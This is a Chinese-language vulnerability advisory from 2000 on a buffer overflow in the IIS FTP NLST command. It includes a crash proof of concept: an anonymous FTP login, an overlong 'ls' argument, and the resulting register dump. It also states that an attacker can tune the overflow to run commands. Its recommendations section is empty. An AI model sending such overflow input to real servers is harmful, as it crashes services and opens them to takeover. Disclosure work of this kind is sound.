发布日期: 2000-9-9
更新日期: 2000-9-9
受影响的系统:
Windows NT 4.0 (SP4) IIS 3.0 / 4.0
Windows 95/98 PWS 1.0
描述:
在IIS FTP服务器中NLST命令存在一个缓冲区溢出漏洞,这个漏洞可能使攻击者在服务器
上非法运行一条命令,如果溢出地址不正确的话,也可能会造成服务器当机。
测试方法:
客户端输入:
C:\>ftp guilt.xyz.com
Connected to guilt.xyz.com.
220 GUILT Microsoft FTP Service (Version 4.0).
User (marc.xyz.com:(none)): ftp
331 Anonymous Access allowed, send identity (e-mail name) as passWord.
Password:
230 Anonymous user logged in.
ftp> ls AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
200 PORT command sUCcessful.
150 Opening ASCII mode data connection for file list
(服务器已关闭)
服务器端反映:
The instruction at '0x710f8aa2' referenced memory at '0x41414156'
EAX = 0000005C EBX = 00000001
ECX = 00D3F978 EDX = 002582DD
ESI = 00D3F978 EDI = 00000000
EIP = 710F8AA2 ESP = 00D3F644
EBP = 00D3F9F0 EFL = 00000206
通过多次的调试和测试,可以得出服务器端准确的溢出地址,从而能在服务器上执行一条非法命令。
建议:
